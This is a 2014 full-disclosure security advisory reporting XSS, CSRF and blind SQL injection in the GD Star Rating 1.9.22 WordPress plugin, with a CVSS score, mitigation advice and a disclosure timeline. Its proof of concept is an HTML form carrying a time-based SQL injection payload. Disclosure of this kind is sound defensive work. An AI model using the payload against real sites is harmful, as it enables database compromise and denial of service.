Date: Fri, 28 Mar 2014 12:37:39 +0000
From: Harry Metcalfe <harry@....com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS,
 CSRF and blind SQL injection in GD Star Rating 1.9.22 (WordPress
 plugin)

Details
================
Software: GD Star Rating
Version: 1.9.22
Homepage: http://wordpress.org/plugins/gd-star-rating/
CVSS: 8.5 (High; AV:N/AC:L/Au:S/C:C/I:N/A:C)

Description
================
XSS, CSRF and blind SQL injection in GD Star Rating 1.9.22

Vulnerability
================
This plugin is vulnerable to SQL injection. Carrying out an SQL
injection requires access to an administrator account. However, the form
contains no CSRF protection and is also vulnerable to XSS so an attacker
may not need direct access to an account to perform denial of service or
to compromise sensitive data.

Proof of concept
================
Proof of concept (see code/adm/db.php at line 154):
<form
action="http://localhost/wp-admin/admin.php?page=gd-star-rating-stats"
method="POST">
   <input type="text" name="s" value="' and sleep(5) = '">
   <input type="text" name="gdsr_search" value="Search Posts">
   <input type="submit">
</form>

Mitigations
================
Disable the plugin until a fix is released.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@....com to acknowledge this report if you
received it via a third party (for example, plugins@...dpress.org) as
they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.

Timeline

2013-07-25: Identified
2014-02-18: Reported to plugins@...dpress.org
2014-03-28: No response received. Published.

Discovered by dxw: